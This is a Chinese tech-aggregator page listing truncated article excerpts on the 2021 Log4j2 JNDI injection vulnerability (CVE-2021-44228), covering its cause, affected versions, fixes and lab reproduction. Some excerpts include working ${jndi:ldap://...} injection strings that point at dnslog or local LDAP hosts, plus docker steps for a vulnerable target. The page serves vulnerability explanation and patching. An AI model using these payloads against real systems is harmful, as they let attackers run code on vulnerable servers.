ICode9

精准搜索请尝试: 精确搜索
  • Log4j 严重漏洞修最新修复方案参考2021-12-21 19:32:33

    CVE-2021-44228,原理上是 log4j-core 代码中的 JNDI 注入漏洞。这个漏洞可以直接导致服务器被入侵,而且由于“日志”场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器。log4j 作为 Java 开发的基础公共日志类,使用范围非常广,漏洞必定影响深远,想想当年commons-collectio

  • log4j2远程代码执行漏洞原因以及解决方案2021-12-20 10:34:27

    漏洞原理 Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻

  • 卧槽!Log4j2 再爆雷,Log4j v2.17.0 横空出世。。。2021-12-20 08:33:54

    Log4j2 再爆雷 Log4j2 这是没完没了了,栈长以为《玩大了!Log4j 2.x 再爆雷。。。》 Log4j 2.16.0 是最终终结版本了,没想到才过多久又爆雷了: 前两天栈长还说 Log4j 2.16.0 是最安全的版本,没想到这么快就又打脸了,Log4j 2.17.0 横空出世。。。 又来了。。Log4j2 这是中了新冠的毒? 这

  • Log4j2史诗级漏洞导致JNDI注入问题探析2021-12-19 06:31:07

    背景 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中,比如在用户登录的时候打印一些异常信息,如xxx密码输入错误超

  • log4j2漏洞升级2021-12-17 17:30:12

    一、影响范围: Apache Log4j 2.x <= 2.15.0-rc1 二、可能受影响的应用不限于以下内容: Spring-Boot-strater-log4j2 Apache Struts2 Apache Solr Apache Druid Apache Flink ElasticSearch Flume Dubbo Jedis Logstash Kafka Apache Storm 三、解决办法: 1、等待官方升级 log4j2 版

  • 为什么加上<log4j2.version>配置就可以更新log4j2的版本?2021-12-17 13:34:22

    最近log4j2的核弹级漏洞席卷了大部分互联网公司,升级版本成了这两周的核心任务。对于要升级到什么版本,最新版本2.16.0是最佳选择。那么如何快速升级,之前也给出了Spring Boot项目升级版本的最简方法。 大家只需要使用这样的简单配置,就可以把log4j2一系列包的版本都升级了。 如果这

  • 为什么加上<log4j2.version>配置就可以更新log4j2的版本?2021-12-17 13:03:32

    最近log4j2的核弹级漏洞席卷了大部分互联网公司,升级版本成了这两周的核心任务。对于要升级到什么版本,最新版本2.16.0是最佳选择。那么如何快速升级,之前也给出了Spring Boot项目升级版本的最简方法。 大家只需要使用这样的简单配置,就可以把log4j2一系列包的版本都升级了。

  • 今日还是热点 | Apache Log4j 高危漏洞2021-12-17 10:32:09

    01. 概要 Apache Log4j2 存在一处远程代码执行漏洞,该漏洞影响范围极广,漏洞危害极大。估计昨天所有的 Java 工程师都在熬夜修改这个漏洞。 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发

  • Apache Log4j2,RASP 防御优势及原理2021-12-17 01:33:35

    Apache Log4j2 远程代码执行漏洞已爆发一周,安全厂商提供各类防御方案和检测工具,甲方团队连夜应急。 影响持续至今,网上流传的各种利用和绕过姿势还在层出不穷,影响面持续扩大。所有安全人都开始反思一个问题:当前的防御是否有效?针对这样的 0day 再次发生,什么是有效的手段? 阿里云安全

  • Apache Log4j2 核弹级漏洞2021-12-16 23:05:09

    近日,Apache Log4j2 的远程代码执行漏洞刷爆朋友圈,该漏洞一旦被攻击者利用会造成严重危害。而且此次漏洞影响巨大,很多网站如百度等都是此次 Log4j 远程代码执行漏洞的受害者,很多互联网企业也都连夜做了应急措施。 漏洞详情: Apache Log4j 远程代码执行漏洞  严重程度: 严重 由于A

  • Log4j2注入漏洞万字剖析-汇总收藏版(攻击步骤、漏洞原理、2.15.0-RC1绕过原理以及2.15.0修复原理)2021-12-16 10:34:53

    一、前言 上周五(12月10日)应该是全世界程序员都不得安宁的一天。楼主早上一到公司就收到安全部分通知Log4j2出现严重安全漏洞,攻击者可以利用该漏洞在服务器上执行任意指令,从而操控服务器。于是一整天我们整个团队都在忙于修复Log4j2漏洞。从最开始修改JVM参数,到后来的2.15.0-RC1

  • Log4j 爆“核弹级”漏洞,除非你付钱给我,否则为何我要编写有用的软件?2021-12-16 09:59:06

    “开源”崩了! 或者换句话说,除非你付钱给我,否则为何我要编写有用的软件? 近日 Java 生态系统一个至关重要的软件包 log4j2 曝出了一个严重的安全漏洞,对整个互联网构成了严重的威胁。一旦完全沦为了武器,该漏洞让攻击者就可以胁迫 Java 服务器执行从 LDAP(轻型目录访问协议)服务器

  • skills_logging2021-12-15 22:05:34

    目录skills_logging1 log4j2, logback的日志文件路径的动态配置23456 skills_logging 1 log4j2, logback的日志文件路径的动态配置 logback配置方式 配置环境变量(linux中) : sudo vim /etc/profile # 在文件的末尾添加该行语句 export logPath=~/logs # 然后保存该文件,再执行以

  • 开源OA协同办公平台搭建教程:开源O2OA中log4j2使用配置2021-12-15 17:01:08

    O2OA应用开发平台是兰德纵横网络技术股份有限公司精心打造的一款开源办公产品,是使用JavaEE技术栈,分布式架构设计的真正全代码开源的企业应用定制化开发平台,平台既可以支持小企业的OA协同办公系统快速搭建,也能支持复杂的集团化大型协同门户及业务平台建设,以最低成本,搭建一个OA办公

  • SpringBoot日志配置-logback和log4j22021-12-14 18:03:05

    SpringBoot默认使用的 commons-logging 日志框架, 默认的日志输出级别: info 使用commons-logging 配置文件对日志的配置: //只需要在配置文件中更改默认值 //设置日志输出级别为debug Debug=true //日志文件名,比如:suke.log,或者是 /var/log/suke.log logging.file=suke.log /

  • 浅谈Log4j和Log4j2的区别2021-12-14 17:32:17

    浅谈Log4j和Log4j2的区别     相信很多程序猿朋友对log4j都很熟悉,log4j可以说是陪伴了绝大多数的朋友开启的编程。我不知道log4j之前是用什么,至少在我的生涯中,是log4j带我开启的日志时代。 log4j是Apache的一个开源项目,我们不去考究它的起源时间,但是据我了解,log4j 1已经不再更新

  • log4j2 JNDI注入复现2021-12-14 17:02:36

    复现现象: 这个镜像使用了log4j2用来当做靶机程序 1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09 2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名 4、执行一个pos

  • Apache log4j2安全漏洞解析及解决方法2021-12-13 23:34:14

    1、使用logj2的低版本记录日志时,如果使用如下方式,则输出:  这是log4j2的一个lookup功能。 2、先用浏览器打开 http://dnslog.cn/ 这个网址,如下图      3、调整代码,执行后,点击刷新 Refresh Record,发现ip获取到了。        4、解决方法: 1、通过jvm参数调整, 2、升级2.1

  • log4j2不打印日志或者打印不受控制的日志解决办法2021-12-13 18:33:30

    起因 前几天一个跑有java应用的生产集群(200多台物理机)升级了一个版本,重启后发现约有50台机器日志不能正常输出,但其程序确能正常的运行,在生产环境中,日志是非常重要的一个监控手段,如果没有日志输出,无疑是非常危险的。 排查 发现这一情况后,立即开始从jdk环境和版本,cpu负载,内存gc,线程s

  • log4j漏洞产生方法和预防2021-12-13 11:58:54

    产生方法 https://0xsapra.github.io/website/CVE-2019-17571 核心部分${jndi:ldap://xxxxx.dnslog.cn/exp} 想办法把用户输入的可执行字符串送到这个位置就行了,日志里经常打印请求参数之类用户输入的内容,比如"参数a:<请求的输入 攻击伪代码示例: import org.apache.log4j.Lo

  • 史上最全log4j2远程命令执行漏洞汇总报告2021-12-13 11:00:57

        已投稿信安之路公众号,文章链接

  • Log4j2远程命令执行复现2021-12-12 22:59:29

    Log4j2远程命令执行复现 Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell 一、漏洞环境 环境是http://vulfocus.fofa.so平台的 二、漏洞验证 启动环境后访问 抓包,修改请求为post 在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回

  • log4j JNDI漏洞CVE-2021-44228 针对于不同版本的解决方案2021-12-12 22:00:22

    问题描述: Apache Log4j 2存在远程代码执行漏洞,攻击者可通过构造恶意请求利用该漏洞实现在目标服务器上执行任意代码 漏洞影响版本:2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 看一下目前log4j的maven官方仓库版本,几乎是主流常用版本都受影响 解决方案: 试了一下网上几种方案,

  • 安全漏洞之Log4j2漏洞复现绕过分析2021-12-12 21:33:26

    0x00 介绍 Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告 分配CVE编号:CVE-2021-44228 CVSS评分:10.0(最高只能10分) POC比较简单 public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/bad

  • log4j2 漏洞解析2021-12-12 17:35:58

    log4j2 漏洞解析 转载自: https://www.cnblogs.com/puzhiwei/p/15677816.html   前情提要 Apache 存在 Log4j 远程代码执行漏洞,将给相关企业带来哪些影响?还有哪些信息值得关注?   构建maven项目引入Log4j2 编写 pom 文件 <?xml version="1.0" encoding="UTF-8"?> <project xmln

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有